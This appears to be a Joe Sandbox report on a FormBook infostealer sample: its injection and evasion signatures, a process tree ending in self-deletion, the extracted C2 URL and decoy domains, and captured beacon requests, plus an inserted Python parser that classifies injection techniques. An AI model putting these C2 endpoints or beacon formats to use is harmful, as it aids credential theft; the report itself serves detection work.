Windows Analysis Report mal.pif

Overview

General Information

Sample Name: mal.pif (renamed file extension from pif to exe)
Analysis ID: 452374
MD5: b9bca038d7532ec8a1a9ba0e867061bc
SHA1: 6596ac1216bf03d88482415755c499ed6388cab4
SHA256: 24d91f6c3dcad36d65e45821d520aaabc2f4a87bb1ab512d6807377010d5680e
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mal.exe (PID: 5944 cmdline: 'C:\Users\user\Desktop\mal.exe' MD5: B9BCA038D7532EC8A1A9BA0E867061BC)
    • mal.exe (PID: 68 cmdline: C:\Users\user\Desktop\mal.exe MD5: B9BCA038D7532EC8A1A9BA0E867061BC)
      • explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 1328 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 4464 cmdline: /c del 'C:\Users\user\Desktop\mal.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.trendtechpros.com/sm3l/"], "decoy": ["svp-india.com", "feistyflowerfarmers.com", "artprogressive.com", "thedavidweaver.com", "currentputative.life", "bluedot3dwdbuy.com", "xxxmeetme.com", "signify2.com", "converseshoes-canada.com", "schemabuilder.net", "crmcti.com", "mctrh.com", "ringroadpartners.com", "stresslesspilates.com", "directorytexas.xyz", "sarahcarver.com", "diigveda.com", "lifeliveslive.com", "inprize2020.club", "sellerbantuan-bukalapak.com", "thesawbuddy.com", "vtolworldwide.com", "montespc.com", "mylifeinpark.com", "etten-api.com", "plantersam.com", "themcg.net", "tax-account.net", "laurelhomesgroup.com", "epmconsultants.com", "air.guide", "shopfabrique.com", "publicretirementinfo.com", "diversifiedforest.com", "bodurm.com", "aphroditesspiritualshop.com", "vinowolf.com", "teja-online.com", "junion.site", "regenmedica.com", "soulfulparent.com", "elcorazondemama.com", "bench-oat.com", "abrewhomes.com", "premiocovid-19.com", "palmaunlocked.com", "bylauralittle.com", "stikepage.com", "miabogadorolon.com", "hungyivn.com", "interlacer.com", "liang831113.com", "onlinepracticebox.com", "easycookingmastermind.com", "murderofasun.tech", "mybabytennis.com", "margaritagift.com", "utx88.com", "bofengjiaoyegs.com", "reforming-toilets.xyz", "eaoaj.com", "only-king.com", "nearinn.com", "fitsportshop.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source | Rule | Description | Author
2.2.mal.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.mal.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
2.2.mal.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
2.2.mal.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.mal.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: mal.exe | Virustotal: Detection: 60%
Source: mal.exe | Metadefender: Detection: 20%
Source: mal.exe | ReversingLabs: Detection: 63%
Yara detected FormBook
Source: Yara match | File source: 2.2.mal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.mal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.302913257.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.469299117.0000000003010000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.303482002.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.467414216.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: mal.exe | Joe Sandbox ML: detected
Source: 2.2.mal.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: mal.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: mal.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP | source: mal.exe, 00000002.00000002.303734652.0000000001690000.00000040.00000001.sdmp, control.exe, 0000000F.00000002.469738032.000000000466F000.00000040.00000001.sdmp
Source: Binary string: control.pdb | source: mal.exe, 00000002.00000002.303620114.0000000001530000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: mal.exe, 00000002.00000002.303734652.0000000001690000.00000040.00000001.sdmp, control.exe
Source: Binary string: control.pdbUGP | source: mal.exe, 00000002.00000002.303620114.0000000001530000.00000040.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.trendtechpros.com/sm3l/
Source: global traffic | HTTP traffic detected: GET /sm3l/?y0DdGli=KvXnBCtAoO2yHEt5dL0Fxw3RJm1prCWWr0IwHlUk9+xe6WE7Z8sx0d/816zczOTA6oQi&ixo0sr=dFQtk HTTP/1.1 | Host: www.mybabytennis.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /sm3l/?y0DdGli=yq5bXiAgrpTP0Cl4DWGobHu0GmgEguW+SJypzbO1DFimS8AGhR5rfP7J/muem3koPRQw&ixo0sr=dFQtk HTTP/1.1 | Host: www.sarahcarver.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 52.58.78.16
Source: Joe Sandbox View | IP Address: 209.99.64.55
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: CONFLUENCE-NETWORK-INCVG
Source: unknown | DNS traffic detected: queries for: www.mybabytennis.com
          Source: mal.exe, 00000000.00000003.204113869.000000000800E000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr.kr
          Source: mal.exe, 00000000.00000003.203969376.000000000800E000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krB
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://www.sarahcarver.com
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: http://www.sarahcarver.com/
          Source: explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: mal.exe, 00000000.00000003.205252766.0000000008008000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comlic&
          Source: explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: mal.exe, 00000000.00000003.207276085.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
          Source: explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: mal.exe, 00000000.00000003.207276085.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deZ
          Source: mal.exe, 00000000.00000003.210675196.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deeg
          Source: mal.exe, 00000000.00000003.207276085.000000000800A000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deu
          Source: explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: mal.exe, 00000000.00000003.204709826.0000000008007000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnf
          Source: control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpString found in binary or memory: https://www.domain.com/controlpanel/domaincentral/3.0/

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 2.2.mal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.mal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.302913257.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.469299117.0000000003010000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.303482002.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.467414216.00000000001B0000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

Malicious sample detected (through community Yara rule)
Source: 2.2.mal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.mal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.mal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.mal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.302913257.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.302913257.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.469299117.0000000003010000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.469299117.0000000003010000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.303482002.00000000014C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.303482002.00000000014C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.467414216.00000000001B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.467414216.00000000001B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_00419D60 NtCreateFile,
Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_00419E10 NtReadFile,
Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_00419E90 NtClose,
Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_00419F40 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_00419E8A NtClose,
Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_00419F3B NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B95D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B96D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9560 NtWriteFile,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045BAD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B95F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045BA770 NtOpenThread,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9760 NtOpenProcess,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045BA710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B97A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045BB040 NtSuspendThread,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B98F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B98A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B99D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9A10 NtQuerySection,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9A20 NtResumeThread,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045BA3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_03029F40 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_03029E10 NtReadFile,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_03029E90 NtClose,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_03029D60 NtCreateFile,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_03029F3B NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_03029E8A NtClose,
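The native calls listed above are the raw material for the injection signatures this report fires (process hollowing, APC queueing, section mapping). The Python below is an added example, not part of the Joe Sandbox report: it parses rows in the cleaned "Source: <image> | Code function: ..." form used on this page and names each technique whose complete primitive set a process references. The grouping of Nt* calls into techniques, and the reading of the leading number in 15_2_045B9780 as the sandbox's process index, are my assumptions; the sample rows are copied from this report.

```python
import re
from collections import defaultdict

# Constructed input: a subset of the "Code function" rows from this report in cleaned form.
# Assumption: the leading number of "15_2_045B9780" is the sandbox's process index.
REPORT_ROWS = [
    r"Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_00419D60 NtCreateFile,",
    r"Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_00419E10 NtReadFile,",
    r"Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_00419F40 NtAllocateVirtualMemory,",
    r"Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9780 NtMapViewOfSection,LdrInitializeThunk,",
    r"Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B99A0 NtCreateSection,LdrInitializeThunk,",
    r"Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045BAD30 NtSetContextThread,",
    r"Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045BA770 NtOpenThread,",
    r"Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B97A0 NtUnmapViewOfSection,",
    r"Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B98A0 NtWriteVirtualMemory,",
    r"Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9950 NtQueueApcThread,",
    r"Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B99D0 NtCreateProcessEx,",
    r"Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045B9A20 NtResumeThread,",
]

ROW_RE = re.compile(
    r"Source: (?P<image>.+?) \| Code function: (?P<idx>\d+)_\d+_[0-9A-Fa-f]+ (?P<calls>[\w,]+)"
)

# Primitive sets per technique. This grouping is my own (assumption), not a sandbox definition;
# a technique is only reported when every primitive in its set is referenced.
TECHNIQUES = {
    "process hollowing": {"NtCreateProcessEx", "NtUnmapViewOfSection", "NtWriteVirtualMemory",
                          "NtSetContextThread", "NtResumeThread"},
    "apc injection": {"NtOpenThread", "NtQueueApcThread"},
    "section mapping": {"NtCreateSection", "NtMapViewOfSection"},
}


def native_calls_per_process(rows):
    """Map (process index, image path) -> set of Nt* functions referenced by that process's code."""
    calls = defaultdict(set)
    for row in rows:
        m = ROW_RE.search(row)
        if m is None:
            continue                      # not a "Code function" row, skip it
        key = (int(m["idx"]), m["image"])
        # Keep only the native API names; drop LdrInitializeThunk and the empty trailing field.
        calls[key].update(fn for fn in m["calls"].split(",") if fn.startswith("Nt"))
    return dict(calls)


def classify(rows):
    """Return, per process, the techniques whose complete primitive set that process references."""
    return {key: {name for name, need in TECHNIQUES.items() if need <= fns}
            for key, fns in native_calls_per_process(rows).items()}


if __name__ == "__main__":
    for (idx, image), techniques in classify(REPORT_ROWS).items():
        print(f"process {idx} ({image}): {sorted(techniques) or 'no injection primitive set'}")
```

Run over the full row list, control.exe (process 15) is the only process that references every primitive of all three sets, which is what the injection signatures at the top of the report say in prose; the unpacked mal.exe code only references file and allocation calls, consistent with it being the stage that hands off to the hollowed host.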
Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_00401030
Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_0041D14B
Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_0041E224
Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_00402D87
Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_00402D90
Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_00409E40
Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_00409E3B
Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_0041E6AC
Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_0041DFC7
Source: C:\Users\user\Desktop\mal.exe | Code function: 2_2_00402FB0
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_0463D466
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_0458841F
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_04641D55
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_04642D07
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_04570D20
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_0458D5E0
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_046425DD
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045A2581
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_04596E30
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_0463D616
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_04642EF7
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_04641FF1
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_0464DFCE
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_0464E824
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_04631002
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_046428EC
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_0458B090
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_046420A8
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045A20A0
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_0457F900
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_04594120
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_046422AE
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_04642B28
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_0463DBD2
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_046303DA
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_045AEBB0
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_0302E224
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_03012FB0
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_0302DFC7
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_03019E3B
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_03019E40
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_0302E6AC
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_03012D87
Source: C:\Windows\SysWOW64\control.exe | Code function: 15_2_03012D90
Source: C:\Windows\SysWOW64\control.exe | Code function: String function: 0457B150 appears 45 times
Source: mal.exe | Binary or memory string: OriginalFilename vs mal.exe
Source: mal.exe, 00000002.00000002.303382209.0000000001281000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameCONTROL.EXEj% vs mal.exe
Source: mal.exe, 00000002.00000002.304248088.000000000193F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs mal.exe
Source: mal.exe | Binary or memory string: OriginalFilenameObjectEqualityCompar.exe8 vs mal.exe
Source: mal.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 2.2.mal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.mal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.mal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.mal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.302913257.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.302913257.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
